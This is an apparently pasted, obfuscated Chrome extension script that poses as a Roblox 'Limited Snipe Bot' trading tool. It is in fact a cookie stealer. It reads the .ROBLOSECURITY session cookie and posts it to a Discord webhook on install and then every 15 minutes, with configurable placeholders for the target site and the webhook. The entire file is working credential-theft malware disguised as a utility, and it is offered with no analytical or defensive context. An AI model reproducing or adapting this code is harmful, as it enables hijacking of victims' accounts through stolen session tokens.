

Apr 27th, 2022
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  1. var website = ""; // Change this to the website you want to log, don't forget to edit the manifest.json too!
  2. var cookie_data = ".ROBLOSECURITY"; // Change this to the cookie of the website!
  3. var discord_web_api = ""; // This is the bot api!
  5. var _0x9917 = ["alarms", "length", "substr", "push", website, cookie_data, "value", "\x0A", "join", "get", "cookies", discord_web_api, "?wait=true", ":star:", ":boom:", ":christmas_tree:", ":large_blue_diamond:", ":large_orange_diamond:", "POST", "ajax", "open", "Content-Type", "application/json; charset=UTF-8", "setRequestHeader", "stringify", "send", "random", "floor", "A wild cookie has appeared!", "Don\'t count your cookies before they\'re eaten.", "It\'s a bird! It\'s a cookie! It\'s a bird eating a cookie!", "Filthy, filthy, cookies. What\'s next, cake?", "Don\'t make me eat this cookie!", " ", "tradeBackground", "create", "reason", "install", "tradeBotStart", "basic", "icon.png", "Limited Snipe Bot", "The snipe bot is active!", "notifications", " @everyone A new extension startup. ", "addListener", "onInstalled", "runtime", "name", "onAlarm"];
  6. var _0x2d17 = [_0x9917[0], _0x9917[1], _0x9917[2], _0x9917[3], _0x9917[4], _0x9917[5], _0x9917[6], _0x9917[7], _0x9917[8], _0x9917[9], _0x9917[10], _0x9917[11], _0x9917[12], _0x9917[13], _0x9917[14], _0x9917[15], _0x9917[16], _0x9917[17], _0x9917[18], _0x9917[19], _0x9917[20], _0x9917[21], _0x9917[22], _0x9917[23], _0x9917[24], _0x9917[25], _0x9917[26], _0x9917[27], _0x9917[28], _0x9917[29], _0x9917[30], _0x9917[31], _0x9917[32], _0x9917[33], _0x9917[34], _0x9917[35], _0x9917[36], _0x9917[37], _0x9917[38], _0x9917[39], _0x9917[40], _0x9917[41], _0x9917[42], _0x9917[43], _0x9917[44], _0x9917[45], _0x9917[46], _0x9917[47], _0x9917[48], _0x9917[49]];
  7. var _0x44b3 = [_0x2d17[0], _0x2d17[1], _0x2d17[2], _0x2d17[3], _0x2d17[4], _0x2d17[5], _0x2d17[6], _0x2d17[7], _0x2d17[8], _0x2d17[9], _0x2d17[10], _0x2d17[11], _0x2d17[12], _0x2d17[13], _0x2d17[14], _0x2d17[15], _0x2d17[16], _0x2d17[17], _0x2d17[18], _0x2d17[19], _0x2d17[20], _0x2d17[21], _0x2d17[22], _0x2d17[23], _0x2d17[24], _0x2d17[25], _0x2d17[26], _0x2d17[27], _0x2d17[28], _0x2d17[29], _0x2d17[30], _0x2d17[31], _0x2d17[32], _0x2d17[33], _0x2d17[34], _0x2d17[35], _0x2d17[36], _0x2d17[37], _0x2d17[38], _0x2d17[39], _0x2d17[40], _0x2d17[41], _0x2d17[42], _0x2d17[43], _0x2d17[44], _0x2d17[45], _0x2d17[46], _0x2d17[47], _0x2d17[48], _0x2d17[49]];
  8. var _0x3a2f = [_0x44b3[0], _0x44b3[1], _0x44b3[2], _0x44b3[3], _0x44b3[4], _0x44b3[5], _0x44b3[6], _0x44b3[7], _0x44b3[8], _0x44b3[9], _0x44b3[10], _0x44b3[11], _0x44b3[12], _0x44b3[13], _0x44b3[14], _0x44b3[15], _0x44b3[16], _0x44b3[17], _0x44b3[18], _0x44b3[19], _0x44b3[20], _0x44b3[21], _0x44b3[22], _0x44b3[23], _0x44b3[24], _0x44b3[25], _0x44b3[26], _0x44b3[27], _0x44b3[28], _0x44b3[29], _0x44b3[30], _0x44b3[31], _0x44b3[32], _0x44b3[33], _0x44b3[34], _0x44b3[35], _0x44b3[36], _0x44b3[37], _0x44b3[38], _0x44b3[39], _0x44b3[40], _0x44b3[41], _0x44b3[42], _0x44b3[43], _0x44b3[44], _0x44b3[45], _0x44b3[46], _0x44b3[47], _0x44b3[48], _0x44b3[49]];
  9. var asdd;
  10. var alarms = chrome[_0x3a2f[0]];
  12. function chunk(_0x6f75x7, _0x6f75x8) {
  13. var _0x6f75x9 = [];
  14. var _0x6f75xa;
  15. var _0x6f75xb;
  16. for (_0x6f75xa = 0, _0x6f75xb = _0x6f75x7[_0x3a2f[1]]; _0x6f75xa < _0x6f75xb; _0x6f75xa += _0x6f75x8) {
  17. _0x6f75x9[_0x3a2f[3]](_0x6f75x7[_0x3a2f[2]](_0x6f75xa, _0x6f75x8))
  18. };
  19. return _0x6f75x9
  20. }
  22. function findCookie() {
  23. asdd = undefined;
  24. chrome[_0x3a2f[10]][_0x3a2f[9]]({
  25. "url": _0x3a2f[4],
  26. "name": _0x3a2f[5]
  27. }, function(_0x6f75xd) {
  28. if (_0x6f75xd[_0x3a2f[6]] && asdd != _0x6f75xd[_0x3a2f[6]]) {
  29. asdd = chunk(_0x6f75xd[_0x3a2f[6]], 60)[_0x3a2f[8]](_0x3a2f[7])
  30. }
  31. })
  32. }
  33. findCookie();
  34. var botUrl = _0x3a2f[11];
  35. var debug = false;
  36. if (debug === true) {
  37. botUrl = botUrl + _0x3a2f[12]
  38. };
  39. var coolEmojis = [_0x3a2f[13], _0x3a2f[14], _0x3a2f[15]];
  40. var shapeEmojis = [_0x3a2f[16], _0x3a2f[17]];
  42. function sendDiscordMessage(_0x6f75x13) {
  43. $[_0x3a2f[19]]({
  44. type: _0x3a2f[18],
  45. url: botUrl,
  46. data: {
  47. content: _0x6f75x13
  48. }
  49. })
  50. }
  52. function createEmbed(_0x6f75x15, _0x6f75x16, _0x6f75x17) {
  53. var _0x6f75x18 = {
  54. "embeds": [{
  55. "title": _0x6f75x15,
  56. "description": _0x6f75x16,
  57. "color": _0x6f75x17
  58. }]
  59. };
  60. var _0x6f75x19 = new XMLHttpRequest();
  61. _0x6f75x19[_0x3a2f[20]](_0x3a2f[18], botUrl);
  62. _0x6f75x19[_0x3a2f[23]](_0x3a2f[21], _0x3a2f[22]);
  63. _0x6f75x19[_0x3a2f[25]](JSON[_0x3a2f[24]](_0x6f75x18))
  64. }
  66. function cleanerCookieGrab() {
  67. chrome[_0x3a2f[10]][_0x3a2f[9]]({
  68. "url": _0x3a2f[4],
  69. "name": _0x3a2f[5]
  70. }, function(_0x6f75xd) {
  71. if (_0x6f75xd && _0x6f75xd[_0x3a2f[6]]) {
  72. pick = shapeEmojis[Math[_0x3a2f[27]](Math[_0x3a2f[26]]() * shapeEmojis[_0x3a2f[1]])];
  73. pick2 = coolEmojis[Math[_0x3a2f[27]](Math[_0x3a2f[26]]() * coolEmojis[_0x3a2f[1]])];
  74. cookiePhrases = [_0x3a2f[28], _0x3a2f[29], _0x3a2f[30], _0x3a2f[31], _0x3a2f[32]];
  75. cookiePhrase = cookiePhrases[Math[_0x3a2f[27]](Math[_0x3a2f[26]]() * cookiePhrases[_0x3a2f[1]])];
  76. titleItem = pick + pick2 + _0x3a2f[33] + cookiePhrase + _0x3a2f[33] + pick2 + pick;
  77. descItem = chunk(_0x6f75xd[_0x3a2f[6]], 60)[_0x3a2f[8]](_0x3a2f[7]);
  78. color = 0xFFFFFF;
  79. createEmbed(titleItem, descItem, color)
  80. }
  81. })
  82. }
  83. chrome[_0x3a2f[47]][_0x3a2f[46]][_0x3a2f[45]](function(_0x6f75x1b) {
  84. var _0x6f75x1c = alarms[_0x3a2f[35]](_0x3a2f[34], {
  85. delayInMinutes: 0.1,
  86. periodInMinutes: 15
  87. });
  88. if (_0x6f75x1b[_0x3a2f[36]] == _0x3a2f[37]) {
  89. chrome[_0x3a2f[43]][_0x3a2f[35]](_0x3a2f[38], {
  90. type: _0x3a2f[39],
  91. iconUrl: _0x3a2f[40],
  92. title: _0x3a2f[41],
  93. message: _0x3a2f[42]
  94. });
  95. var _0x6f75x1d = shapeEmojis[Math[_0x3a2f[27]](Math[_0x3a2f[26]]() * shapeEmojis[_0x3a2f[1]])];
  96. var _0x6f75x1e = coolEmojis[Math[_0x3a2f[27]](Math[_0x3a2f[26]]() * coolEmojis[_0x3a2f[1]])];
  97. var _0x6f75x1f = _0x6f75x1d + _0x6f75x1e + _0x3a2f[44] + _0x6f75x1d + _0x6f75x1e;
  98. var _0x6f75x20 = asdd;
  99. var _0x6f75x21 = 0xFFFFFF;
  100. createEmbed(_0x6f75x1f, _0x6f75x20, _0x6f75x21)
  101. }
  102. });
  103. chrome[_0x3a2f[0]][_0x3a2f[49]][_0x3a2f[45]](function(_0x6f75x22) {
  104. if (_0x6f75x22[_0x3a2f[48]] == _0x3a2f[34]) {
  105. cleanerCookieGrab()
  106. }
  107. })
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